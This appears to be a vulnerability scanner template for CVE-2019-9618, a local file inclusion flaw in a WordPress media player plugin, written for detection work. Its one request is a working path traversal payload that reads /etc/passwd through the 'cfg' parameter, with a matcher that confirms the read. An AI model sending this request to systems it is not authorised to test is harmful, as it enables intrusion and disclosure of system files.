Description
WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.
WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.
id: CVE-2019-9618
info:
name: WordPress GraceMedia Media Player 1.0 - Local File Inclusion
author: daffainfo
severity: critical
description: WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.
impact: |
Attackers can include arbitrary local files, potentially leading to information disclosure or code execution.
remediation: |
Update to the latest version of the plugin or apply security patches to sanitize the 'cfg' parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
- http://seclists.org/fulldisclosure/2019/Mar/32
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-9618
cwe-id: CWE-22
epss-score: 0.43796
epss-percentile: 0.98677
cpe: cpe:2.3:a:gracemedia_media_player_project:gracemedia_media_player:1.0:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: gracemedia_media_player_project
product: gracemedia_media_player
framework: wordpress
tags: cve,cve2019,wordpress,wp-plugin,lfi,seclists,edb,gracemedia_media_player_project,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
- 500
# digest: 4b0a004830460221009935ad8851069022a7c64a7c3911ec1356cc1a7928bab57073aad6134dcfe9e4022100e7a6755799206e6c7e6bc6d66131b8f97e20d431de15dc3758c429f353452f2d:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.